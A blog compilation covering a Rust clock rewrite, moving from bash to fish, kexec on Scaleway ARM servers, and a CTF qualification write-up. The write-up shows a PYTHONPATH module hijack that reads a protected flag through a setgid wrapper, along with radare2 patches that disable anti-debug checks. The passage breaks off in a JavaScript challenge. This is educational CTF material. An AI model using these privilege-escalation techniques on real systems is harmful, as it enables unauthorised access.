Since this is a clock, I was surprised to find no date/time package in the rust standard library. But the rust cookbook recommends using chrono, which looks like the de-facto crate for this job. It looks quite good and is well documented, but it's hard to discover such a crucial missing part when you're doing offline work and can't go search for crates.

The rewrite differs from the original a bit since it uses SDL2 instead of SDL 1.2. It also uses an event pump instead to build an event loop, instead of a manually built one. Unlike games, this program does not need to update at 60 frames per second, but at best only once per second. The original program had two updates per second as an heuristic not to miss updates. This time I wanted to be a bit more clever with the event loop, and only update on window events (window just reappeared) or every second. Unfortunately, there's no timer event in SDL, so my solution is a bit hackish: the program just checks if the second changed to do the refresh.

In the end, the new program seems to consume more CPU resources than the original, but I haven't looked in depth at the cause (rust-c ffi? SDL2 event loop?); this will be an area of improvement for future work.

Update June 14, 2020: I have now fixed the higher CPU usage, and it was due to misunderstanding how events work in SDL2.

Bash : so long, and thanks for all the fish !

2019-03-31T00:00:00+01:00

I recently took the plunge and decided to move to fish, a friendly modern shell.

Background

I'm heavily invested in bash. I wrote countless scripts, for my personal use, and for various jobs or projects, so I didn't think it would be an easy thing to move away from it. But I tried anyway, because if you always stay in your comfort zone, you never learn anything, and stop growing. And I didn't regret it. I've moved to fish (3.0.2 at the time of this writing) on all my machines, including Termux on my mobile phone.

The trigger was probably, in retrospect, the fact that the bash development process makes AOSP feel like a model of open source development, see for example this git commit.

Fish is in written in C++ (but it looks mostly like modern C), has a github, CI, pull requests, and more than one contributor. It's 14 years old (vs 30 for bash or 29 for zsh), so it's pretty young compared to other shells. But the project is still very mature.

Differences from bash

One important aspect, is that fish is designed around a simpler language, and is not POSIX-compatible. It makes the command lines and the scripts much easier to read. This also means that you shouldn't uninstall bash just yet, it might be useful to run those legacy scripts :-)

Although you can write scripts pretty easily, fish is mostly designed around the command line use. It works very well by default, and requires very little configuration. For example, while there's no full-featured linter like shellcheck (which you should really use with bash), fish has live-command line syntax check: if it knows it won't be able to run your command because of a syntax error or non-existing command, it will highlight it in red, allowing you to fix it before even running.

A core fish feature is the auto-suggestions: they mostly replace and remove the need to use reverse history search (Ctrl+R); they are enabled by default and take some time to get used to, but make you very productive in the end. You can still search in history by typing part of a previous command, and then pressing UP. This is useful since auto-suggestions work only search history (and completions, file paths) the beginning of a command.

While there's an fzf integration, I didn't really feel the need to use it.

Since the language is different, you cannot simply add environment to a command like this: VAR=x cmd, you need to use env to run the command: env VAR=x cmd. It's a bit longer to type. You also need to be careful if you have such command in your config files, for example I had to change this vim fugitive configuration:

let g:fugitive_git_executable="LANG=C LC_ALL=C git"

into this:

let g:fugitive_git_executable="env LANG=C LC_ALL=C git" (that's because fugitive parses git output in english).

This construct is portable to other shells as well, so that's fine.

Another big difference is command substitution: $(cmd) becomes (cmd) (and `cmd` isn't supported at all, but you shouldn't be using it anyway).

Pitfalls and limitations

When attempting to port some bash functions over to fish, I noticed other missing features:

there is no short &> or |& combined stderr/stdout redirection (issue)
there is no parameter expansion of variables (out of scope)
Process substitution only works for input, not output, with psub. For example diff <(sort file1) <sort file2) in bash, becomes diff (sort file1 | psub) (sort file2 | psub) in fish. (issue for output)
there is no fc to edit the last command in your $EDITOR, but you can do that with UP, then Alt+E to edit the current line.
there is no history substitution (!! for example), use arrow keys, like you'd do in bash.

Good surprises

Pasting in fish works as it always should have: it does not execute commands, and wraps multiple lines properly. This invalidates pastejacking attacks for example.

History is managed transparently by fish: the ~/.local/share/fish/fish_history text file is using an internal fish format. It means searching through it is more efficient when history goes bigger. And fish supports merging the history from other fish sessions with a single history --merge command ! This means I'll never have to run exec bash in all my open sessions to do a history sync again !

Fish also imports bash history automatically on first run, but it might take a while if you have a big history (a few minutes for 50k lines on one of the machines).

Python3 venvs work as they should if you include activate.fish.

Getting started

Just try fish in browser; it follows the tutorial, and explains all the basic features !

Running latest kernels on ARM Scaleway servers

2018-12-21T00:00:00+01:00

Scaleway, a french cloud provider, has been renting baremetal ARM servers for a few years now, and virtual ARM64 servers more recently. They ship with a scaleway-provided kernel and initird, which isn't updated as often as I'd like. The latest ARMv7 (32 bits) kernel, is 4.9.93, while the latest 4.9 LTS at the time of this writing is 4.9.146. 53 versions behind is a lot, so I've been looking at how to work around this.

A bad surprise

At the latest Golang Paris meetup, I did a livecoding introduction to autocert. Unfortunately,the demo at the end failed, despite the code being correct (it was still my fault, though.). After digging through, it all pointed out to something wrong on the server.

This server, was a C1 ARM server from Scaleway, was one of the first ever (baremetal) ARM servers available at cloud provider. Based on custom hardware with a Marvell ARMv7 SoC, it was also very cheap at launch, and still one of the cheapest baremetal server to rent out there. Since then, Packet has launched ARM64 servers based on the Cavium ThunderX (much more expensive, with 96 cores and 2 SoCs on board), and Scaleway followed suite with virtual servers based on the same platform (with 4 to 64 cores), and much more affordable.

The C1 server was updated regularly, in addition to unattended-upgrades being enabled. But what seemed odd was the old kernel version (4.5.7). Since I had provisioned it (more or less), it had been running the same kernel version, despite having been rebooted a few times. Which isn't really a good idea, at least for security reasons.

And it turned out, for at least one other reason as well: golang binaries starting with Go 1.9, failed to initialize the crypto-rng using the getrandom syscall, blocking forever. Updating to a more recent kernel (4.9.93) fixed the issue. But the update process required using the Scaleway web interface or the API, the cli tool does not (AFAIK) support this operation. Sidenote: I know that in a cloud world I should just spin up a new server and redeploy to it. I'll get there once I'm comfortable enough that it can work with my apps :-)

While this fixed this particular issue, it got me thinking about the general process for managing these servers. Should I setup a script or an ansible role to update the bootscript regularly ? Isn't there a better way, in order to use the distro kernels ? That led me to contemplate using kexec.

ARMv7 kexec attempts

Fortunately, I was not the first to have this idea, since Scaleway's initramfs scripts directly support using kexec to a new kernel ! You can find a tutorial here, but unfortunately, it only covers x86 servers.

I quickly learned that the serial console on the web interface is inferior to the one provided by the cli tool: ./scw attach <server-name>. All the boot logs from this post are captured with it.

My first attempts were therefore to use the KEXEC_KERNEL=/vmlinuz and KEXEC_INIRTD=/initrd.img server tags, but it failed to work. Here is the boot log output with INITRD_VERBOSE=1

** Message: /dev/nbd6 is not used[   30.528536] kexec_core: Starting new kernel

** Message: cm[   30.583224] Disabling non-boot CPUs ...
d check mode
** Message: /dev/n[   30.672735] CPU1: shutdown
bd7 is not used
** Message: cmd check mode
** Message: /dev/nbd8 is not used
[   30.791469] CPU2: shutdown
** Message: cmd check mode
** Message: /dev/nbd9 is not used
*[   30.891720] CPU3: shutdown
* Message: cmd check mode
** Message: /dev/nbd1[   30.960773] Bye!
0 is not used

The output is a bit mangled, and I lack visibility into how it's being done. So I wanted to add more kernel debug options: I tried the using KEXEC_APPEND="debug initcall_debug". But then I discovered that the server tags did not support having spaces inside, since the tokenisation was space-based.

I then decided to use INITRD_DROPBEAR=1 to start a shell in the initrd, giving me control into how the kexec is run. Initially, I was wondering if the fact that I didn't boot with a device tree was causing an issue. So I dumped the device-tree from the running process and re-built it with dtc. I made sure to re-use the command line from the current boot, and to properly detach the nbd block device. I attempted to use a more recent kexec userspace tool, and add a debugging option. After many attempts, I had a script to run inside the initramfs that looked like this:

#!/bin/sh

export PATH=/sbin/:/usr/sbin:$PATH

cp /newroot/initrd.img /
cp /newroot/vmlinuz /
cp /newroot/sbin/kexec /

/newroot/usr/bin/dtc -I fs -O dtb -o /generated-dtb /proc/device-tree/

umount /newroot
xnbd-client -c /dev/nbd0
xnbd-client -d /dev/nbd0

/kexec -d -l --append="verbose debug $(cat /proc/cmdline) is_in_kexec=yes root=/dev/nbd0 nbdroot=10.1.52.66,4448,nbd0" --dtb=/generated-dtb --ramdisk=/initrd.img  --type=zImage /vmlinuz
/kexec -d -e

Since the dropbear in initramfs lacks the scp server part, and kept generating new host keys on boot, I pushed it like this:

cat kexec-initramfs-script.sh | ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no root@myc1server "tee -a kexec.sh && chmod +x kexec.sh"

Then, it ran without any obvious error:

kernel: 0xb66ef008 kernel_size: 0x7d8200
MEMORY RANGES
0000000000000000-000000007fffefff (0)
zImage header: 0x016f2818 0x00000000 0x007d8200
zImage size 0x7d8200, file size 0x7d8200
zImage has tags
  offset 0x0000ae48 tag 0x5a534c4b size 8
kernel image size: 0x015c5d14
kexec_load: entry = 0x8000 flags = 0x280000
nr_segments = 3
segment[0].buf   = 0xb66ef008
segment[0].bufsz = 0x7d8200
segment[0].mem   = 0x8000
segment[0].memsz = 0x7d9000
segment[1].buf   = 0xb3603008
segment[1].bufsz = 0x30eba91
segment[1].mem   = 0x15ce000
segment[1].memsz = 0x30ec000
segment[2].buf   = 0x4f45a8
segment[2].bufsz = 0x45bc
segment[2].mem   = 0x46ba000
segment[2].memsz = 0x5000

But the serial console output was always the same:

[  129.248360] kexec_core: Starting new kernel
[  129.298586] Disabling non-boot CPUs ...
[  129.393572] CPU1: shutdown
[  129.532515] CPU2: shutdown
[  129.632399] CPU3: shutdown
[  129.700758] Bye!

And no new kernel seemed to boot… That's when I gave up, and decided to try something new. While writing this post, I also opened an issue to inform Scaleway of this status.

ARMv8 servers

I decided to check the ARMv8 virtual servers I had heard about. I already have arm64 experience, and I noticed that the pricing was similar (3€ per months for 4 cores + 2GB). So I instantiated one and tried to see if kexec could work on it. I first used the KEXEC_KERNEL and KEXEC_INITRD parameters, but it failed since there is no kexec in the arm64 initramfs:

>>> kexec: kernel=/vmlinuz initrd=/initrd.img append=''
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: kexec: not found

It wasn't really an issue, since I had already resolved to use the rootfs' kexec tool previously (to have a more recent version), so I just enabled the INITRD_DROPBEAR ssh server, and ran a script on it. And it worked. Well, mostly: the kernel booted, but it couldn't mount the rootfs because it was looking for in /dev/vda ; which is the full block device, not the root partition: /dev/vda1. This is due to a bad parameter on the kernel command line; it doesn't affect Scaleway's initramfs because they do clever things.

After passing root=/dev/vda1, I finally had a working distro, with an up-to-date kernel.

Tutorial

After instaling kexec-tools, I added the following /boot.sh script:

#!/bin/sh
if grep -q is_in_kexec=yes /proc/cmdline; then 
        exit 0
fi
kexec -f --ramdisk=/initrd.img --append="$(cat /proc/cmdline) is_in_kexec=yes root=/dev/vda1" /vmlinuz

I don't use systemctl kexec, because it goes back to the initramfs, and kexec does not exist there…

And this systemd unit (to be improved, it starts very late, doesn't umount or stop services) kexec.service:

[Unit]
Description=Boot to kexec kernel if needed

[Service]
Type=oneshot
ExecStart=/boot.sh

[Install]
WantedBy=network.target basic.target

And then enabled it with systemctl enable kexec.service. That's all that's needed to always boot to the distribution's shipped kernel!

Bug notes

During my tests, I encountered many times IRQ exceptions on reboot; the VM is then broken, and needs api reboot; during the last tests to write this blog post, a reboot caused a permanent crash: even after using the API restart, the server was blocked in a transient state("rebooting server"), forbidding any other action. I hope a simple reboot in a VM can't crash the orchestrator or worse (hypervisor), affecting other clients. Update: after I contacted Scaleway support, they gave me be back access to the server: it was still rebooting endlessly and I was able to restart it with the API; I'm guessing the hypervisor didn't crash, and probably no other customers were affected.

Also during my explorations, I accidentally accessed the boot menu on the server (using a keyboard shortcut on the serial console). I don't think that's an issue since this is due to the fact that the full EFI stack is emulated as well. It might be possible to configure the bootloader to boot directly the kernel I want, but I haven't explored this possibility. It might require the EFI bootloader to understand virtio block devices, which might be possible.

Conclusion

The boot time is quite slow with this solution, since I have to boot the system twice (56 seconds before kexec, about 31 seconds after). Once the root= and kexec in initramfs bugs are fixed, I can use the server tags and have a faster boot; otherwise I might publish an ansible role to automate this process.

I also decided to migrate my services on the ARMv8 server, since it performs much better : +50% to +1300% on sysbench; only the threads and hackbench message passing tests were slower, I'm guessing due to virtualization. It also has IPv6 available, if enabled.

Be careful though: these servers are often out of stock, and I didn't notice, but I was lucky it was in stock when I provisioned it, since it isn't anymore in the Paris (par1) region, but is available in the Amsterdam ams1 datacenter (with low stock though). There might be a trick to bypass the "out of stock" status, but I doubt this works reliably.

SIGSEGV1 qualification CTF

2018-10-12T00:00:00+02:00

After my r2con r2wars writeup, here's another writeup of a "challenge". This challenge is the Capture-The-Flag (CTF) pre-qualifications for the SIGSEGV1 conference in Paris. It felt a bit weird to have a conference registration limited to those who pass a certain challenge, but I was curious about what it would be like, so I thought: why not ?

Fun avec python

The first challenge was around python, one had to connect to a server, and try to capture the "flag", a file which you don't have access to, by exploiting a vulnerability in code on the server. This is what it looks like:

chall@ae805fd9fe99:~$ ls -l
total 16
-r--r----- 1 root chall-pwned   42 Oct  5 17:00 flag
-rwxr-xr-x 1 root root         307 Sep 20 00:21 hello-world.py
-rwxr-sr-x 1 root chall-pwned 6304 Oct  5 17:05 wrapper

The flag file is the goal, but we can't read it with our permission level (chall user. ). The wrapper is a suid binary that just calls the hello-world.py script. This is the content of the script:

#!/usr/bin/python2.7

from colors import colors

def main():
    print('This is an advanced hello-world')
    print('The world is more joyful with colors')
    print('So, here we are:')
    print('{}Hello-World !{}'.format(colors.bcolors.OKBLUE, colors.bcolors.ENDC))

if __name__ == '__main__':
    main()

One of the issue, is that when calling suid-binaries, you control the environment, and if it isn't cleared, you can control how the executables behave. Here, we are attacking the python script (it's the name of the challenge). The goal will be to use the import clause of the script to run our one code.

I reproduced the environment locally to do some tests, here is my test.py script:

#!/usr/bin/env python2
import colors

print("coucou")

And here is the colors.py I used:

#!/usr/bin/env python
print open("flag", "r").readline()

Running test.py on my machine shows that it's executing code in colors.py before doing anything, so it works. Now, I need to upload colors.py on the server, somewhere I can write files. Home isn't writable, so I just used /tmp. I put colors.py in /tmp/colors/. Then, I used the PYTHONPATH variable to run the script with the search path for modules modified:

chall@ae805fd9fe99:~$ PYTHONPATH=/tmp ./wrapper
sigsegv{518012356c8a2ed93b8d3e2416bb2274}

Traceback (most recent call last):
  File "/home/chall/hello-world.py", line 3, in <module>
    from colors import colors
ImportError: cannot import name colors

The rest of the script fails, but, we can clearly see the flag: sigsegv{518012356c8a2ed93b8d3e2416bb2274}

antistrings

This is a simple reverse engineering challenge, but with a few traps. I fell into all of them. The binary is backed up here if you want to see for yourself.

Despite the title being, "antistrings", I still went ahead and looked at the strings:

$ r2 linux_x64_chall_v1.bin
 -- This is just an existentialist experiment.
[0x00400650]> iz
[Strings]
Num Vaddr      Paddr      Len Size Section  Type  String
000 0x00000b48 0x00400b48 147 148 (.rodata) ascii Strings won't help you that much.\n\n[+] Activating obfuscation layer 1...\n[+] Act]
001 0x00000bdc 0x00400bdc  12  13 (.rodata) ascii KIS\bJED@\rL]_
002 0x00000bed 0x00400bed   4   5 (.rodata) ascii \nBB^
003 0x00000bf2 0x00400bf2   8   9 (.rodata) ascii _YMCJ@];
004 0x00000c00 0x00400c00  15  16 (.rodata) ascii fIIO[K_YAO[Y^\@
005 0x00000c15 0x00400c15   4   5 (.rodata) ascii RZJX
006 0x00000c1a 0x00400c1a  13  14 (.rodata) ascii K($b%($!grdcA
007 0x00000c28 0x00400c28   9  10 (.rodata) ascii lHDG[XNOY
008 0x00000c32 0x00400c32   5   6 (.rodata) ascii F^AGG
009 0x00000c3d 0x00400c3d   5   6 (.rodata) ascii [\]TP
010 0x00000c48 0x00400c48  11  12 (.rodata) ascii ~\rz\b~OGOBCJ
011 0x00000c5b 0x00400c5b   4   5 (.rodata) ascii jm|v
012 0x00000c60 0x00400c60  10  11 (.rodata) ascii ^V^,-'-# L
013 0x00000c6b 0x00400c6b  10  11 (.rodata) ascii ~\rz\byFNM^K
014 0x00000c76 0x00400c76   5   6 (.rodata) ascii U_FVF
015 0x00000c80 0x00400c80   4   5 (.rodata) ascii \W]Z

So, the strings are encrypted. No big deal, I'll find later how.

[0x00400650]> aaa
...snip...8<...
[0x00400650]> s main
[0x00400aa2]> pdf
┌ (fcn) main 19
│   main (int argc, char **argv, char **envp);
│           ; DATA XREF from entry0 (0x40066d)
│           0x00400aa2      4883ec08       sub rsp, 8
│           0x00400aa6      b800000000     mov eax, 0
│           0x00400aab      e830ffffff     call fcn.004009e0
│           0x00400ab0      4883c408       add rsp, 8
└           0x00400ab4      c3             ret

A short main() (I skipped the libc entry point here), going to directly to another function.

[0x00400aa2]> s fcn.004009e0
[0x004009e0]> pdf 10
┌ (fcn) fcn.004009e0 16
│   fcn.004009e0 ();
│       ⁝   ; CALL XREF from main (0x400aab)
│       ⁝   0x004009e0      4883ec28       sub rsp, 0x28               ; '('
│       ⁝   0x004009e4      50             push rax
│       ⁝   0x004009e5      31c0           xor eax, eax
│       ⁝   0x004009e7      85c0           test eax, eax
│       ⁝   0x004009e9      58             pop rax
│      ┌──< 0x004009ea      7502           jne 0x4009ee
│     ┌───< 0x004009ec      7401           je 0x4009ef
│     │││   ; CODE XREF from fcn.004009e0 (0x4009ea)
└     │└└─< 0x004009ee      ebb9           jmp 0x4009a9                ; sub.BB_7c2+0x1e7

Here we can see the first trick: a jump to an unaligned address, after testing a very simple (always true) condition.

[0x004009e0]> s 0x4009ef
[0x004009ef]> pd 10
│           ; CODE XREF from fcn.004009e0 (0x4009ec)
│           0x004009ef      b900000000     mov ecx, 0
            0x004009f4      ba01000000     mov edx, 1
            0x004009f9      be00000000     mov esi, 0
            0x004009fe      bf00000000     mov edi, 0
            0x00400a03      b800000000     mov eax, 0
            0x00400a08      e823fcffff     call sym.imp.ptrace
            0x00400a0d      4885c0         test rax, rax
        ┌─< 0x00400a10      791e           jns 0x400a30

And here we have the first anti-debug: ptrace(PTRACE_TRACEME, 0, 0, 0) is called. The manpage says this is to Indicate that this process is to be traced by its parent.. In other words, this is used to detect if the process is currently being ptraced, which is the basic building block of all debuggers on Linux. On success, the program will print "not cool bro", and then exit.

My first idea, was to modify the binary (it doesn't seem to have any integrity verification built-in). We want to simulate ptrace() returning an error; we'll just put -1 into eax, the return register in this x86 call convention. This is done with:

[0x004009ef]> s 0x00400a08
[0x00400a08]> "wa sub eax, 1;nop;nop"

Don't forget to open the binary with r2 in write mode (-w command line switch). Afterwards, the code looks like this:

            0x004009ef      b900000000     mov ecx, 0
            0x004009f4      ba01000000     mov edx, 1
            0x004009f9      be00000000     mov esi, 0
            0x004009fe      bf00000000     mov edi, 0
            0x00400a03      b800000000     mov eax, 0
            0x00400a08      83e801         sub eax, 1
            0x00400a0b      90             nop
            0x00400a0c      90             nop
            0x00400a0d      4885c0         test rax, rax
        ┌─< 0x00400a10      791e           jns 0x400a30

No more ptrace()! This might be useful if I want to run the binary in a VM with gdb or strace. Let's continue on the execution path.

[0x004009ef]> s 0x400a30
[0x00400a30]> pd 10
            ;-- rip:
            ; CODE XREF from fcn.004009e0 (+0x30)
            0x00400a30      bf480c4000     mov edi, str.z___OGOBCJ     ; 0x400c48 ; "~\rz\b~OGOBCJ\x10E]\x13@]S\x17jm|v\x1c^V^,-'-# L"
            0x00400a35      e80cfdffff     call sub.strlen_746
            0x00400a3a      4889c7         mov rdi, rax
            0x00400a3d      b800000000     mov eax, 0
            0x00400a42      e879fbffff     call sym.imp.printf         ; int printf(const char *format)

The first obfuscated string appears here. It is then passed to a function (that calls strlen()) that will transform it (decrypt?) before printing it. Let's see what this function looks like.

[0x00400a30]> pdf @sub.strlen_746
┌ (fcn) sub.strlen_746 124
│   sub.strlen_746 (char *arg1);
│           ; var char *s @ rsp+0x8
│           ; var void *local_10h @ rsp+0x10
│           ; var size_t size @ rsp+0x18
│           ; var int local_1ch @ rsp+0x1c
│           ; arg char *arg1 @ rdi
│           ; CALL XREFS from sub.BB_7c2 (0x4009a6, 0x4009c4)
│           ; CALL XREF from fcn.004009e0 (+0x3c)
│           ; CALL XREFS from rip (+0x5, +0x1c)
│           0x00400746      4883ec28       sub rsp, 0x28               ; '('
│           0x0040074a      48897c2408     mov qword [s], rdi          ; arg1
│           0x0040074f      488b442408     mov rax, qword [s]          ; [0x8:8]=-1 ; 8
│           0x00400754      4889c7         mov rdi, rax                ; const char *s
│           0x00400757      e854feffff     call sym.imp.strlen         ; size_t strlen(const char *s)
│           0x0040075c      89442418       mov dword [size], eax
│           0x00400760      8b442418       mov eax, dword [size]       ; [0x18:4]=-1 ; 24
│           0x00400764      4898           cdqe
│           0x00400766      4889c7         mov rdi, rax                ; size_t size
│           0x00400769      e8a2feffff     call sym.imp.malloc         ; void *malloc(size_t size)
│           0x0040076e      4889442410     mov qword [local_10h], rax
│           0x00400773      c744241c0000.  mov dword [local_1ch], 0
│       ┌─< 0x0040077b      eb31           jmp 0x4007ae
│       │   ; CODE XREF from sub.strlen_746 (0x4007b6)
│      ┌──> 0x0040077d      8b44241c       mov eax, dword [local_1ch]  ; [0x1c:4]=-1 ; 28
│      ⁝│   0x00400781      4863d0         movsxd rdx, eax
│      ⁝│   0x00400784      488b442410     mov rax, qword [local_10h]  ; [0x10:8]=-1 ; 16
│      ⁝│   0x00400789      4801d0         add rax, rdx                ; '('
│      ⁝│   0x0040078c      8b54241c       mov edx, dword [local_1ch]  ; [0x1c:4]=-1 ; 28
│      ⁝│   0x00400790      4863ca         movsxd rcx, edx
│      ⁝│   0x00400793      488b542408     mov rdx, qword [s]          ; [0x8:8]=-1 ; 8
│      ⁝│   0x00400798      4801ca         add rdx, rcx                ; '&'
│      ⁝│   0x0040079b      0fb612         movzx edx, byte [rdx]
│      ⁝│   0x0040079e      8b4c241c       mov ecx, dword [local_1ch]  ; [0x1c:4]=-1 ; 28
│      ⁝│   0x004007a2      83c125         add ecx, 0x25               ; '%'
│      ⁝│   0x004007a5      31ca           xor edx, ecx
│      ⁝│   0x004007a7      8810           mov byte [rax], dl
│      ⁝│   0x004007a9      8344241c01     add dword [local_1ch], 1
│      ⁝│   ; CODE XREF from sub.strlen_746 (0x40077b)
│      ⁝└─> 0x004007ae      8b44241c       mov eax, dword [local_1ch]  ; [0x1c:4]=-1 ; 28
│      ⁝    0x004007b2      3b442418       cmp eax, dword [size]       ; [0x18:4]=-1 ; 24
│      └──< 0x004007b6      7cc5           jl 0x40077d
│           0x004007b8      488b442410     mov rax, qword [local_10h]  ; [0x10:8]=-1 ; 16
│           0x004007bd      4883c428       add rsp, 0x28               ; '('
└           0x004007c1      c3             ret

Wow, that's a lot of code. Let's take some time to process this. The first part saves the size of the argument in local variable size, then allocates a second buffer of the same size.

The second part will loop over both buffers, and put in the decoded buffer, each character, like this:

decoded[i] = a[i] ^ 0x25

It then returns the decoded string. I wrote a small python program to reproduce this:

#!/usr/bin/env python3
import sys
a = sys.stdin.read()
print("".join([chr(ord(a[i]) ^ (i+0x25)) for i in range(len(a)) ]) )

We can then use this from r2 to decode a random string:

[0x00400a30]> pr 48 @ str.fIIO_K_YAO_Y | ./decode.py

Congratulations! You have the flag :-)

Hum, this looks interesting. Let's rename the r2 string flag to remember this, it will be useful later to locate where this is printed:

[0x00400a30]> fr str.fIIO_K_YAO_Y "str.Congratulations! You have the flag :-)"

Let's continue where we left off: we wanted to decode, then print a string. Let's see what it was:

[0x00400a30]> pr 48 @ str.z___OGOBCJ |./decode.py

[+] Welcome to the RTFM challenge

Nice ! This is the programs's opening prompt. Let's continue with the next printed string:

[0x00400a42]> pr 48 @ str.z__yFNM_K |./decode.py

[+] Please enter the flag: @ACXG~
GHIBKLMV����ST

Once this is shown, we have the read() on stdin that asks for the flag:

            0x00400a6d      4889e0         mov rax, rsp
            0x00400a70      ba14000000     mov edx, 0x14               ; 20
            0x00400a75      4889c6         mov rsi, rax
            0x00400a78      bf00000000     mov edi, 0
            0x00400a7d      e85efbffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)

And then another unaligned jump trick to fool the reader, but reversed (eax != 0):

            0x00400a82      50             push rax
            0x00400a83      31c0           xor eax, eax
            0x00400a85      85c0           test eax, eax
            0x00400a87      58             pop rax
        ┌─< 0x00400a88      7502           jne 0x400a8c
       ┌──< 0x00400a8a      7401           je 0x400a8d
       ││   ; CODE XREF from rip (+0x58)
      ┌─└─> 0x00400a8c      eb48           jmp 0x400ad6

Followed by a function call:

[0x00400a42]> pd 10 @ 0x400a8c
            ; CODE XREF from rip (+0x58)
        ┌─< 0x00400a8c      eb48           jmp 0x400ad6
        │   0x00400a8e      89e0           mov eax, esp
        │   0x00400a90      4889c7         mov rdi, rax
        │   0x00400a93      e82afdffff     call sub.BB_7c2

In this function we'll see something curious:

[0x00400650]> s sub.BB_7c2
[0x004007c2]> pd 30
┌ (fcn) sub.BB_7c2 396
│   sub.BB_7c2 (int arg1);
│           ; var int local_8h @ rsp+0x8
│           ; var void *buf @ rsp+0x10
│           ; var unsigned int fildes @ rsp+0x28
│           ; var signed int local_2ch @ rsp+0x2c
│           ; arg int arg1 @ rdi
│           ; CALL XREF from fcn.004009e0 (+0xb3)
│           0x004007c2      4883ec38       sub rsp, 0x38               ; '8'
│           0x004007c6      48897c2408     mov qword [local_8h], rdi   ; arg1
│           0x004007cb      c744242c20a1.  mov dword [local_2ch], 0x7a120 ; [0x7a120:4]=-1
│       ┌─< 0x004007d3      eb47           jmp 0x40081c
│       │   ; CODE XREF from sub.BB_7c2 (0x400821)
│      ┌──> 0x004007d5      836c242c01     sub dword [local_2ch], 1
│      ⁝│   0x004007da      be00000000     mov esi, 0                  ; int oflag
│      ⁝│   0x004007df      bfed0b4000     mov edi, str.BB             ; 0x400bed ; "\nBB^\x06_YMCJ@];" ; const char *path
│      ⁝│   0x004007e4      b800000000     mov eax, 0
│      ⁝│   0x004007e9      e852feffff     call sym.imp.open           ; int open(const char *path, int oflag)
│      ⁝│   0x004007ee      89442428       mov dword [fildes], eax
│      ⁝│   0x004007f2      837c242800     cmp dword [fildes], 0
│     ┌───< 0x004007f7      7918           jns 0x400811
│     │⁝│   0x004007f9      488d4c2410     lea rcx, [buf]              ; 0x10 ; 16
│     │⁝│   0x004007fe      8b442428       mov eax, dword [fildes]     ; [0x28:4]=-1 ; '(' ; 40
│     │⁝│   0x00400802      ba0a000000     mov edx, 0xa                ; size_t nbyte
│     │⁝│   0x00400807      4889ce         mov rsi, rcx                ; void *buf
│     │⁝│   0x0040080a      89c7           mov edi, eax                ; int fildes
│     │⁝│   0x0040080c      e8cffdffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)
│     │⁝│   ; CODE XREF from sub.BB_7c2 (0x4007f7)
│     └───> 0x00400811      8b442428       mov eax, dword [fildes]     ; [0x28:4]=-1 ; '(' ; 40
│      ⁝│   0x00400815      89c7           mov edi, eax                ; int fildes
│      ⁝│   0x00400817      e8b4fdffff     call sym.imp.close          ; int close(int fildes)
│      ⁝│   ; CODE XREF from sub.BB_7c2 (0x4007d3)
│      ⁝└─> 0x0040081c      837c242c00     cmp dword [local_2ch], 0
│      └──< 0x00400821      7fb2           jg 0x4007d5

open() is called on a file, which once decoded the name is /dev/urandom. But the filename is never decoded. Is this a bug ? Or a last minute modification ? Then, 10 bytes are read() from this file. The file is closed. And this is done again. 0x7a120 times ! This is another anti-debug, probably designed to slow down strace. I tried running the binary (in a disposable VM!); strace is indeed very slow. Running the binary directly takes less than 5 seconds to pass this code. I'm guessing that it was probably decided that actually opening and reading the blocks in /dev/urandom would be too slow, or less portable. Or it's just a bug :smile:

Since I had already disabled an anti-debug, I disable this one as well:

[0x004007c2]> s 0x004007cb
[0x004007cb]> "wa  mov dword [rsp+0x2c], 0"

By setting the loop counter to 0 instead of 0x7a120, this anti-debug code is never run.

After this, there's another unaligned jump trick, and then the value that was read() previously is finally analyzed:

[0x0040082e]> pd 20 @ 0x40082e
│           ; CODE XREF from sub.BB_7c2 (0x40082b)
│           0x0040082e      488b442408     mov rax, qword [local_8h]   ; [0x8:8]=-1 ; 8
            0x00400833      0fb600         movzx eax, byte [rax]
            0x00400836      3c73           cmp al, 0x73                ; 's' ; 115
        ┌─< 0x00400838      0f8581010000   jne 0x4009bf                ; sub.BB_7c2+0x1fd
        │   0x0040083e      488b442408     mov rax, qword [rsp + 8]    ; [0x8:8]=-1 ; 8
        │   0x00400843      4883c001       add rax, 1
        │   0x00400847      0fb600         movzx eax, byte [rax]
        │   0x0040084a      3c69           cmp al, 0x69                ; 'i' ; 105
       ┌──< 0x0040084c      0f856d010000   jne 0x4009bf                ; sub.BB_7c2+0x1fd
       ││   0x00400852      488b442408     mov rax, qword [rsp + 8]    ; [0x8:8]=-1 ; 8
       ││   0x00400857      4883c002       add rax, 2
       ││   0x0040085b      0fb600         movzx eax, byte [rax]
       ││   0x0040085e      3c67           cmp al, 0x67                ; 'g' ; 103
      ┌───< 0x00400860      0f8559010000   jne 0x4009bf                ; sub.BB_7c2+0x1fd

It looks like a character-by-character comparison of the buffer read, starting with 's', then 'i', then 'g'. Is this the flag ? We know (it's in the rules) that the flags are in the format sigsegv{FLAG}, so this looks like it ! Two "unaligned jumps" later, we can gather all the characters for the flag. This is left as an exercise for the reader.

This was a quite tedious debug. In fact, I could have ignored most of this, and jumped directly to the interesting part: the analysis of the read() result. Instead, I spent a lot of time disabling anti-debugs, analyzing the decryption function, and I even played a bit with ESIL emulation (not shown here). It was fun, but it could have been solved much more quickly. The top challenger did it ~4 minutes, while it took me a few hours, but I learned a lot along the way !

Javascript obfusqué

This challenge starts quite simply. You can find the backed-up source here. Just opening the developer console in the browser allows you to quickly see the whole unpacked code (formatted a bit here):

function Kod(s, pass) {
    var i=0;
    var BlaBla="";
    for(j=0; j<s.length; j++) {
        BlaBla+=String.fromCharCode((pass.charCodeAt(i++))^(s.charCodeAt(j)));
        if (i>=pass.length) i=0; 
    }
    return(BlaBla);
}
function f(form){
    var pass=document.form.pass.value;
    var hash=0;
